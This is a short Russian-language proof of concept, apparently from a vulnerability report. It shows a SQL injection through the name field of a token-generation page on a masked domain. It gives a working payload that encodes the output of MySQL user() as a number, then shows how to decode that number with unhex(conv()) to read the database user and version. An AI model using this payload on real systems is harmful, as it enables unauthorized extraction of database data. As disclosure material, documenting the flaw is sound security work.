- Заходим сюда https://
{%mask_value%}
/tokens
- Кликаем сгенерировать и вводим имя
- Перехватываем запрос и вставляем следующий пейлоад
1'*CONV(HEX(SUBSTRING((SELECT user() LIMIT 1), 1, 8)), 16, 10)*1);-- -'
- Снова идём на https://
{%mask_value%}
/tokens, берём полученное число и вставляем например тут (https://www.calculator.net/scientific-notation-calculator.html), чтобы убрать 'e'
- С полученным числом идём сюда https://sql-academy.org/ru/sandbox и выполняем запрос
SELECT unhex(conv(*yournumber*, 10, 16));
Mysql user: SELECT unhex(conv(8030591446374774000, 10, 16));
Mysql version: SELECT unhex(conv(4048226090021826000, 10, 16));